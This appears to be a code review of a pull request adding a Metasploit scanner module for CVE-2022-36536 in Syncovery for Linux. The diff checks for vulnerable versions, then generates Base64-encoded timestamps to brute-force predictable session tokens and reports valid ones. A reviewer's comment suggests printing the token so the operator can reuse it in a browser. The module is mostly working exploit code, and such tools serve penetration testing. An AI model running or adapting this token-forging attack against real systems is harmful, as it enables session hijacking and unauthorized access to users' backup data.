modules/auxiliary/scanner/http/syncovery_linux_token_cve_2022_36536.rb

```diff
@@ -0,0 +1,153 @@
+      'USER_FILE', 'USERPASS_FILE', 'PASS_FILE', 'PASSWORD'
+    )
+  end
+
+  def check_host(_ip)
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, '/get_global_variables'),
+      'method' => 'GET'
+    )
+
+    if res && res.code == 200
+      json_res = res.get_json_document
+      if json_res['isSyncoveryWindows'] == 'false'
+        version = json_res['SyncoveryTitle']&.scan(/Syncovery\s([A-Za-z0-9.]+)/)&.flatten&.first || ''
+        if version.empty?
+          vprint_warning("#{peer} - Could not identify version")
+          Exploit::CheckCode::Detected
+        elsif Rex::Version.new(version) < Rex::Version.new('9.48j') || Rex::Version.new(version) == Rex::Version.new('9.48')
+          vprint_good("#{peer} - Syncovery #{version}")
+          Exploit::CheckCode::Appears
+        else
+          vprint_status("#{peer} - Syncovery #{version}")
+          Exploit::CheckCode::Safe
+        end
+      else
+        Exploit::CheckCode::Safe
+      end
+    else
+      Exploit::Unknown
+    end
+  end
+
+  def run_host(ip)
+    # Calculate dates
+    days = datastore['DAYS']
+    if days < 0
+      days = 0
+    end
+    dates = []
+    (0..days).each do |day|
+      dates << (Date.today - day).strftime('%m/%d/%Y')
+    end
+    time = DateTime.now.strftime('%H:%M:%S')
+    hrs, min, sec = time.split(':')
+
+    # Create possible session tokens
+    cred_collection = Metasploit::Framework::PrivateCredentialCollection.new
+    dates.each do |date|
+      (0..hrs.to_i).reverse_each do |hours|
+        (0..min.to_i).reverse_each do |minutes|
+          (0..sec.to_i).reverse_each do |seconds|
+            timestamp = "#{date} #{format('%.2d', hours)}:#{format('%.2d', minutes)}:#{format('%.2d', seconds)}"
+            cred_collection.add_private(Base64.strict_encode64(timestamp).strip)
+          end
+          sec = 59
+        end
+        min = 59
+      end
+      hrs = 23
+    end
+
+    print_status("#{peer.strip} - Starting Brute-Forcer")
+    scanner = Metasploit::Framework::LoginScanner::SyncoveryFileSyncBackup.new(
+      host: ip,
+      port: rport,
+      cred_details: cred_collection,
+      stop_on_success: true, # this will have no effect due to the scanner behaviour when scanning without username
+      connection_timeout: 10
+    )
+
+    scanner.scan! do |result|
+      credential_data = result.to_h
+      credential_data.merge!(
+        module_fullname: fullname,
+        workspace_id: myworkspace_id
+      )
+
+      if result.success?
+        credential_data.delete(:username) # This service uses no username
+        credential_core = create_credential(credential_data)
+        credential_data[:core] = credential_core
+        create_credential_login(credential_data)
+        print_good("#{peer.strip} - VALID TOKEN: #{result.credential.private}")
+      else
+        invalidate_login(credential_data)
+        vprint_error("#{peer.strip} - INVALID TOKEN: #{result.credential.private}")
+      end
```

Comment:
Unfortunately, the `credentials` database currently doesn't handle this kind of authentication token. Technically, this can be done the way you did, but since it is a session Token and cannot be reused by other modules directly, I would just printing it out so the operator can paste it into Chrome dev tools or whatever they need to do with it.
```suggestion
    scanner.scan! do |result|
      if result.success?
        print_good("#{peer.strip} - VALID TOKEN: #{result.credential.private}")
      else
        vprint_error("#{peer.strip} - INVALID TOKEN: #{result.credential.private}")
      end
```